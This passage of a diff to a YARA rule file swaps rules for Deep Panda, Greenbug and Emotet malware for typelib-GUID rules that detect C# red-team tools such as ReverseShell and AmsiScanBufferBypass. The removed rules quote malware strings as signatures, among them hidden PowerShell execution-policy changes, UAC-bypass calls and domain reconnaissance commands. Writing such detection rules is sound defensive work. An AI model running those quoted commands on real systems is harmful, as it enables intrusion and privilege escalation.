-		$s20 = "%s\\%s.exe" fullword ascii
+		$typelibguid0lo = "5a869ab2-291a-49e6-a1b7-0d0f051bef0e" ascii wide
+		$typelibguid0up = "5A869AB2-291A-49E6-A1B7-0D0F051BEF0E" ascii wide
 
 	condition:
-		10 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Deeppanda_Htran_Exe
+rule SIGNATURE_BASE_HKTL_NET_GUID_Reverseshell : FILE
 {
 	meta:
-		description = "Hack Deep Panda - htran-exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2a551e82-aff1-5a77-bc5e-d06e49dca8bc"
-		date = "2015-02-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_deeppanda.yar#L51-L70"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "876932d5-a65d-5230-9cb8-24038ad8af0d"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/chango77747/ReverseShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L462-L478"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
-		logic_hash = "9ac5ddc53d3d5292acb3dcf68e66bc3f6ab4b8e61a71597dd84454adc516f95d"
+		logic_hash = "b736919d47877bcca21ba0fb136fe2ed39b645f6b1e9e9b5f0f2fc4758814174"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
-		$s2 = "\\Release\\htran.pdb" ascii
-		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s8 = "======================== htran V%s =======================" fullword ascii
-		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s15 = "[+] OK! I Closed The Two Socket." fullword ascii
-		$s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
+		$typelibguid0lo = "980109e4-c988-47f9-b2b3-88d63fababdc" ascii wide
+		$typelibguid0up = "980109E4-C988-47F9-B2B3-88D63FABABDC" ascii wide
+		$typelibguid1lo = "8abe8da1-457e-4933-a40d-0958c8925985" ascii wide
+		$typelibguid1up = "8ABE8DA1-457E-4933-A40D-0958C8925985" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Deeppanda_Trojan_Kakfum
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpc2 : FILE
 {
 	meta:
-		description = "Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a204f9cb-65f8-53ea-a4eb-d89112942073"
-		date = "2015-02-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_deeppanda.yar#L72-L90"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2ed6d74e-2b95-5c70-807a-4da5e62f5853"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/SharpC2/SharpC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L480-L504"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0710edea973dce6f5feccf2e7e508cd5f65aa451e0bb5aca503778ffe2363401"
+		logic_hash = "f145c6061a4babb006acb84b3dd16a9fe7ce5819c9a656f0a947119016cf992b"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
-		hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
 
 	strings:
-		$s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
-		$s1 = "%s\\sqlsrv32.dll" fullword ascii
-		$s2 = "%s\\sqlsrv64.dll" fullword ascii
-		$s3 = "%s\\%d.tmp" fullword ascii
-		$s4 = "ServiceMaix" fullword ascii
-		$s15 = "sqlserver" fullword ascii
+		$typelibguid0lo = "62b9ee4f-1436-4098-9bc1-dd61b42d8b81" ascii wide
+		$typelibguid0up = "62B9EE4F-1436-4098-9BC1-DD61B42D8B81" ascii wide
+		$typelibguid1lo = "d2f17a91-eb2d-4373-90bf-a26e46c68f76" ascii wide
+		$typelibguid1up = "D2F17A91-EB2D-4373-90BF-A26E46C68F76" ascii wide
+		$typelibguid2lo = "a9db9fcc-7502-42cd-81ec-3cd66f511346" ascii wide
+		$typelibguid2up = "A9DB9FCC-7502-42CD-81EC-3CD66F511346" ascii wide
+		$typelibguid3lo = "ca6cc2ee-75fd-4f00-b687-917fa55a4fae" ascii wide
+		$typelibguid3up = "CA6CC2EE-75FD-4F00-B687-917FA55A4FAE" ascii wide
+		$typelibguid4lo = "a1167b68-446b-4c0c-a8b8-2a7278b67511" ascii wide
+		$typelibguid4up = "A1167B68-446B-4C0C-A8B8-2A7278B67511" ascii wide
+		$typelibguid5lo = "4d8c2a88-1da5-4abe-8995-6606473d7cf1" ascii wide
+		$typelibguid5up = "4D8C2A88-1DA5-4ABE-8995-6606473D7CF1" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Greenbug_Malware_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sneakyexec : FILE
 {
 	meta:
-		description = "Detects Malware from Greenbug Incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3375a392-4896-572c-9688-00f01ea86ca7"
-		date = "2017-01-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L12-L26"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "853b630d-77ba-5847-a129-c9fa0538f81b"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/HackingThings/SneakyExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L506-L520"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e060a197dec0ce5da385abd282f0c4397bace8945b36198955925d02444b37a3"
+		logic_hash = "a1a88512f8da078f9eb4ece21106b1cb0ba99ad86f5d3f90b036b647bb396fd4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76"
 
 	strings:
-		$s1 = "vailablez" fullword ascii
-		$s2 = "Sfouglr" fullword ascii
+		$typelibguid0lo = "612590aa-af68-41e6-8ce2-e831f7fe4ccc" ascii wide
+		$typelibguid0up = "612590AA-AF68-41E6-8CE2-E831F7FE4CCC" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Greenbug_Malware_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Urbanbishoplocal : FILE
 {
 	meta:
-		description = "Detects Backdoor from Greenbug Incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5d5ddae-cf6d-579f-9a67-9406838b5e0b"
-		date = "2017-01-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L28-L54"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "53b690ec-7d20-5e46-b368-b458ce56073d"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/slyd0g/UrbanBishopLocal"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L522-L536"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "25a9e1f08187f3d3cd0ec1384a5f4647c3368b99062f2e0d7d45c6c2ffeb66e0"
+		logic_hash = "0102e3ecbc13503858ad2119f206fa052caefdf557bbc62448c6da8c8b540de1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d"
-		hash2 = "21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685"
-		hash3 = "319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6c"
 
 	strings:
-		$x1 = "|||Command executed successfully" fullword ascii
-		$x2 = "\\Release\\Bot Fresh.pdb" ascii
-		$x3 = "C:\\ddd\\a1.txt" fullword wide
-		$x4 = "Bots\\Bot5\\x64\\Release" ascii
-		$x5 = "Bot5\\Release\\Ism.pdb" ascii
-		$x6 = "Bot\\Release\\Ism.pdb" ascii
-		$x7 = "\\Bot Fresh\\Release\\Bot" ascii
-		$s1 = "/Home/SaveFile?commandId=CmdResult=" fullword wide
-		$s2 = "raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday" fullword ascii
-		$s3 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
-		$s4 = "SELECT * FROM AntiVirusProduct" fullword wide
+		$typelibguid0lo = "88b8515e-a0e8-4208-a9a0-34b01d7ba533" ascii wide
+		$typelibguid0up = "88B8515E-A0E8-4208-A9A0-34B01D7BA533" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Greenbug_Malware_3
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshell : FILE
 {
 	meta:
-		description = "Detects Backdoor from Greenbug Incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "68142bcd-4bd0-5c80-97fc-38811565e21c"
-		date = "2017-01-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L56-L73"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5966be44-c010-5c63-9576-1aaf36397d6c"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/cobbr/SharpShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L538-L554"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f4e8672da2ed9d90d4ebfccca977c4aeb93656d9e467cf479699cefd03611f32"
+		logic_hash = "1a0d81f4bccde400d981da9cf769972fe1b8da44911c0805e6226f1db2ba0e84"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
-		hash2 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
 
 	strings:
-		$x1 = "F:\\Projects\\Bot\\Bot\\Release\\Ism.pdb" fullword ascii
-		$x2 = "C:\\ddd\\wer2.txt" fullword wide
-		$x3 = "\\Microsoft\\Windows\\tmp43hh11.txt" wide
+		$typelibguid0lo = "bdba47c5-e823-4404-91d0-7f6561279525" ascii wide
+		$typelibguid0up = "BDBA47C5-E823-4404-91D0-7F6561279525" ascii wide
+		$typelibguid1lo = "b84548dc-d926-4b39-8293-fa0bdef34d49" ascii wide
+		$typelibguid1up = "B84548DC-D926-4B39-8293-FA0BDEF34D49" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Greenbug_Malware_4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Evilwmiprovider : FILE
 {
 	meta:
-		description = "Detects ISMDoor Backdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d45dea36-6051-5531-afd2-abf27cd06a12"
-		date = "2017-01-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L75-L101"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3a6cf00e-28c4-5e6f-a28d-b3f28fca6eed"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/sunnyc7/EvilWMIProvider"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L556-L570"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "869832536d838e062227ccd3b84f8559d2215360c0e09ec791db623d7d3d7a3b"
+		logic_hash = "5999197c1ccc2b3e9043c1cd4f73ef607f46b8eab0cd93889263cc460a3ba2c8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
-		hash2 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
 
 	strings:
-		$s1 = "powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuser" fullword ascii
-		$s2 = "powershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"" fullword ascii
-		$s3 = "c:\\windows\\temp\\tmp8873" fullword ascii
-		$s4 = "taskkill /im winit.exe /f" fullword ascii
-		$s5 = "invoke-psuacme"
-		$s6 = "-method oobe -payload \"\"" fullword ascii
-		$s7 = "C:\\ProgramData\\stat2.dat" fullword wide
-		$s8 = "Invoke-bypassuac" fullword ascii
-		$s9 = "Start Keylog Done" fullword wide
-		$s10 = "Microsoft\\Windows\\WinIt.exe" fullword ascii
-		$s11 = "Microsoft\\Windows\\Tmp9932u1.bat\"" fullword ascii
-		$s12 = "Microsoft\\Windows\\tmp43hh11.txt" fullword wide
+		$typelibguid0lo = "a4020626-f1ec-4012-8b17-a2c8a0204a4b" ascii wide
+		$typelibguid0up = "A4020626-F1EC-4012-8B17-A2C8A0204A4B" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Greenbug_Malware_5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Gadgettojscript : FILE
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "12362711-f466-5f9e-9227-1cf84aec93e5"
-		date = "2017-01-25"
-		modified = "2023-01-27"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L103-L128"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e296795f-d006-52a9-92c4-fb60c930564b"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/med0x2e/GadgetToJScript"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L572-L588"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cdb4b2447e7eb3546b33a804abf5fbc20817823e5c9440109db7b44adf90899d"
+		logic_hash = "07ba9b4c303c12a74a13b28dddd4b1118cc30335bf9e76d8146224242619e87d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
-		hash2 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
-		hash3 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
-		hash4 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
 
 	strings:
-		$x1 = "cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter" fullword ascii
-		$x2 = "cmd /a /c net user administrator /domain >>" fullword ascii
-		$x3 = "cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\" ascii
-		$o1 = "========================== (Net User) ==========================" ascii fullword
+		$typelibguid0lo = "af9c62a1-f8d2-4be0-b019-0a7873e81ea9" ascii wide
+		$typelibguid0up = "AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9" ascii wide
+		$typelibguid1lo = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii wide
+		$typelibguid1up = "B2B3ADB0-1669-4B94-86CB-6DD682DDBEA3" ascii wide
 
 	condition:
-		filesize < 2000KB and ( ( uint16( 0 ) == 0x5a4d and 1 of them ) or $o1 )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Greenbug_Malware_Nov17_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Azurecli_Extractor : FILE
 {
 	meta:
-		description = "Detects Greenbug Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "50816c09-5f38-5e05-9915-b96f00ee4b88"
-		date = "2017-11-26"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/greenbug/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L141-L169"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f595545a-a7a6-577c-b3f4-febf7bf1b6c3"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/0x09AL/AzureCLI-Extractor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L590-L604"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "afd006d7e53cdedbed5938e5dea71273dd21a1382239bac03194662e95d053c8"
+		logic_hash = "5ea4dd540a39ac1160da15434b19036a99da69ea999ca0b0f5193fe32a263dca"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6e55e161dc9ace3076640a36ef4a8819bb85c6d5e88d8e852088478f79cf3b7c"
-		hash2 = "a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821"
 
 	strings:
-		$x1 = "AgentV2.exe  -c  SampleDomain.com" fullword ascii
-		$x2 = ".ntpupdateserver.com" fullword ascii
-		$x3 = "Content-Disposition: form-data; name=\"file\"; filename=\"a.a\"" fullword ascii
-		$x4 = "a67d0db885a3432576548a2a03707334" fullword ascii
-		$x5 = "a67d0db8a2a173347654432503702aa3" fullword ascii
-		$x6 = "!!! can not create output file !!!" fullword ascii
-		$s1 = "\\runlog*" ascii
-		$s2 = "can not specify username!!" fullword ascii
-		$s3 = "Agent can not be configured" fullword ascii
+		$typelibguid0lo = "a73cad74-f8d6-43e6-9a4c-b87832cdeace" ascii wide
+		$typelibguid0up = "A73CAD74-F8D6-43E6-9A4C-B87832CDEACE" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "58ba44f7ff5436a603fec3df97d815ea" or pe.imphash ( ) == "538805ecd776b9a42e71aebf94fde1b1" or 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Typical_Malware_String_Transforms : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_UAC_Escaper : FILE
 {
 	meta:
-		description = "Detects typical strings in a reversed or otherwise modified form"
-		author = "Florian Roth (Nextron Systems)"
-		id = "86f348b5-0564-5d83-bbea-4f4a5f62fd30"
-		date = "2016-07-31"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_transformed_strings.yar#L10-L56"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ea95ff3c-0cbb-5230-b5e4-bd8b2ff975eb"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/UAC-Escaper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L606-L620"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1d3813e0d20b82ceda56d03589bb944f747dfe931396ed514fb6b36f72f98c26"
-		score = 60
-		quality = 83
+		logic_hash = "b6e293a6c1589b527ac4d72ccc5609b6899a8ff69009d30e9a93b046484564c8"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$e1 = "exe.tsohcvs" fullword ascii
-		$e2 = "exe.ssasl" fullword ascii
-		$e3 = "exe.rerolpxe" fullword ascii
-		$e4 = "exe.erolpxei" fullword ascii
-		$e5 = "exe.23lldnur" fullword ascii
-		$e6 = "exe.dmc" fullword ascii
-		$e7 = "exe.llikksat" fullword ascii
-		$l1 = "lld.23lenreK" fullword ascii
-		$l2 = "lld.ESABLENREK" fullword ascii
-		$l3 = "lld.esabtpyrc" fullword ascii
-		$l4 = "lld.trcvsm" fullword ascii
-		$l5 = "LLD.LLDTN" fullword ascii
-		$i1 = "paeHssecorPteG" fullword ascii
-		$i2 = "sserddAcorPteG" fullword ascii
-		$i3 = "AyrarbiLdaoL" fullword ascii
-		$i4 = "AssecorPetaerC" fullword ascii
-		$r1 = "teSlortnoCtnerruC" fullword ascii
-		$r2 = "nuR\\noisreVtnerruC" fullword ascii
-		$f1 = "\\23metsys\\" ascii
-		$f2 = "\\23metsyS\\" ascii
-		$f3 = "niB.elcyceR$" fullword ascii
-		$f4 = "%tooRmetsyS%" fullword ascii
-		$fp1 = "Application Impact Telemetry Static Analyzer" fullword wide
+		$typelibguid0lo = "95359279-5cfa-46f6-b400-e80542a7336a" ascii wide
+		$typelibguid0up = "95359279-5CFA-46F6-B400-E80542A7336A" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of them and not 1 of ( $fp* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_Emotet_JS_Dropper_Oct19_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Httpsbeaconshell : FILE
 {
 	meta:
-		description = "Detects Emotet JS dropper"
-		author = "Florian Roth (Nextron Systems)"
-		id = "34605452-8f3d-540a-b66f-4f68d9187003"
-		date = "2019-10-03"
-		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/aaa75105-dc85-48ca-9732-085b2ceeb6eb/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_emotet.yar#L2-L16"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d66e3566-6082-570a-a168-f44c9d8c7619"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L622-L636"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "563077f3bc8ee18a887eecb9f0591c693e5543a9875eebad2186745154af1ade"
+		logic_hash = "b0c40d1ab0bfc34a0f27e7e3f84522a93c0d635cba929a708fbd38dfce4404fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "38295d728522426672b9497f63b72066e811f5b53a14fb4c4ffc23d4efbbca4a"
-		hash2 = "9bc004a53816a5b46bfb08e819ac1cf32c3bdc556a87a58cbada416c10423573"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { FF FE 76 00 61 00 72 00 20 00 61 00 3D 00 5B 00
-               27 00 }
+		$typelibguid0lo = "aca853dc-9e74-4175-8170-e85372d5f2a9" ascii wide
+		$typelibguid0up = "ACA853DC-9E74-4175-8170-E85372D5F2A9" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x0076feff and filesize <= 700KB and $xc1 at 0
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_MAL_Emotet_Jan20_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Amsiscanbufferbypass : FILE
 {
 	meta:
-		description = "Detects Emotet malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "334ae7e5-0a46-5e95-bf53-0f343db4e4de"
-		date = "2020-01-29"
-		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_emotet.yar#L20-L37"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "12a15e61-30fb-50a3-a59b-39f9871444f0"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/rasta-mouse/AmsiScanBufferBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L638-L652"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "23ffcdde3eae7637e5b47a0f940cbebafccfd4c3f222b882e73d7d02447b83c3"
+		logic_hash = "a064209a06c13506b2d2f3754aed30199b0f4f1c0ef4bc465d847a21b0917545"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op0 = { 74 60 8d 34 18 eb 54 03 c3 50 ff 15 18 08 41 00 }
-		$op1 = { 03 fe 66 39 07 0f 85 2a ff ff ff 8b 4d f0 6a 20 }
-		$op2 = { 8b 7d fc 0f 85 49 ff ff ff 85 db 0f 84 d1 }
+		$typelibguid0lo = "431ef2d9-5cca-41d3-87ba-c7f5e4582dd2" ascii wide
+		$typelibguid0up = "431EF2D9-5CCA-41D3-87BA-C7F5E4582DD2" ascii wide
 
 	condition:
